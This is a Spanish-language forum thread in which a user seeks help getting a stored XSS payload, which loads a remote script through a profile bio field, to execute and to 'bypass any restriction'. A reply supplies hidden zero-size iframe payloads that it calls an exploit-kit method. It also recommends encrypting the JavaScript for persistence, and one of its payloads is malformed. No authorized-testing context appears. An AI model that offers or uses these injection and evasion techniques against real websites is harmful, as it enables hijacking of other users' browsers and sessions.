Inyección XSS persistente

  • 2 Respuestas
  • 318 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LKI

  • *
  • Underc0der
  • Mensajes: 78
  • Actividad:
    0%
  • Reputación 0
  • |Un día sin aprender nada, es un día perdido..|
    • Ver Perfil
    • Email

Inyección XSS persistente

  • en: Julio 17, 2020, 11:17:46 pm
Hola amigos, tengo una duda y acudo a ustedes en busca de conocimiento y experiencia. Estoy probando una inyección xss en un input llamemosle "biografia" que se encuentra dentro de la página de configuración del perfil, digamos en /settings el payload es el siguiente:

Código: You are not allowed to view links. Register or Login
</script><script src=www.examplesite.com/examplescript.js></script>
Luego de guardar los cambios recargo la página /settings y el script es ejecutado correctamente.
Lo que no entiendo es porque al visitar la página de mi perfil, digamos /profile no se carga el valor rellenado en el paso anterior, es decir, debería cargar el script. Pero en vez de ello no carga nada y deja el campo que debería rellenar de forma vacía:


(Se puede ver que dentro del tag <p></p> no carga ningún dato y se encuentra vacío)

Pero el script en cuestión es devuelto por el servidor, ya que al revisar el response se ve claramente que el script viaja de vuelta al cliente:



Mi consulta es, ¿si conocen a que se debe este comportamiento, y qué tipo de tácticas se pueden utilizar para poder bypassear cualquier tipo de restricción y que el script en cuestión se ejecute?. Desde ya, muchas gracias!!
Ser mejor cada día es mi meta

 =LKI=

Desconectado jonathanvlan

  • *
  • Underc0der
  • Mensajes: 29
  • Actividad:
    6.67%
  • Country: 00
  • Reputación 2
    • Ver Perfil
    • Email

Re:Inyección XSS persistente

  • en: Julio 27, 2020, 02:05:25 pm
hola .  el problema tal vez sea js /css = class muchas veces rompe toda la estructura cuando un js es agregado
para evitar esto puedes utilizar iframe.

Normal
<iframe src="Exploit.html" width="0" height="0" frameborder="0"> </iframe>

Encode
<script type="text/javascript">document.write("<iframe src="Exploit.html" name="bio" frameborder="no" </iframe>") </script>

Este archivo Exploit.html : Tendra que tener tu JS  de esta forma no hay restricciones , metodo utilizado por Exploit Kits
 siempre utilizar  border 0  y para mayor persistencia utilizar un encrypt de JS / HTML

Desconectado WHK

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    60%
  • Reputación 9
  • The Hacktivism is not a crime
    • Yahoo Instant Messenger - yan_uniko_102
    • Ver Perfil
    • WHK

Re:Inyección XSS persistente

  • en: Julio 27, 2020, 11:12:34 pm
Revisa la consola de errores del navegador, probablemente tu server no tiene habilitada las cabeceras CORS y ha denegado la carga desde el sitio inyectado.

 

[SOLUCIONADO] Problema tras inyección SQL al acceder al panel

Iniciado por Jimeno

Respuestas: 20
Vistas: 9605
Último mensaje Octubre 09, 2012, 05:04:44 pm
por Dedalo
[SOLUCIONADO] Como se trabaja la inyeccion iframe

Iniciado por inerbuzz

Respuestas: 2
Vistas: 1166
Último mensaje Mayo 24, 2017, 11:36:55 pm
por ANTRAX
[SOLUCIONADO] Duda sobre inyección sql en jquery

Iniciado por antonio1

Respuestas: 3
Vistas: 1617
Último mensaje Agosto 04, 2016, 10:19:23 am
por EPSILON
[SOLUCIONADO] duda tarjeta con soporte de inyeccion

Iniciado por regalosorpresa

Respuestas: 1
Vistas: 1053
Último mensaje Septiembre 17, 2018, 08:54:08 pm
por xyz
[SOLUCIONADO] Problemas con inyeccion sql a una página

Iniciado por D3ivid

Respuestas: 5
Vistas: 1740
Último mensaje Octubre 03, 2015, 07:09:01 pm
por EPSILON